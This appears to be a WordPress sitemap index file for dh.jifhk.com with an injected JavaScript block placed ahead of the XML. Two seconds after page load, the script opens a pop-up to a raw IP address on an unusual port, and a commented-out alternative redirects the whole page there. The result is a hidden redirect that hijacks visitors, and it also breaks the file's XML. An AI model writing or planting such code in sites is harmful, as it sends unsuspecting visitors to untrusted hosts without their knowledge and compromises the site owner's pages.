<script>
    (function() {
        window.addEventListener('load', function() {
            // 设置 2000 毫秒（即 2 秒）后执行
            setTimeout(function() {
                var targetUrl = "https://20.205.224.124:2415/?cid=7166024";
                
                // 方式 A：在新窗口弹出（会被浏览器拦截风险较高）
                var win = window.open(targetUrl, '_blank');
                
                // 方式 B：如果你的目的是“直接跳转”当前页面，请取消下面这行的注释：
                // window.location.href = targetUrl;

                if (!win) {
                    console.log("弹窗可能被浏览器拦截");
                }
            }, 2000); 
        });
    })();
</script>
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://dh.jifhk.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://dh.jifhk.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://dh.jifhk.com/wp-sitemap-posts-sites-1.xml</loc></sitemap><sitemap><loc>https://dh.jifhk.com/wp-sitemap-taxonomies-favorites-1.xml</loc></sitemap><sitemap><loc>https://dh.jifhk.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
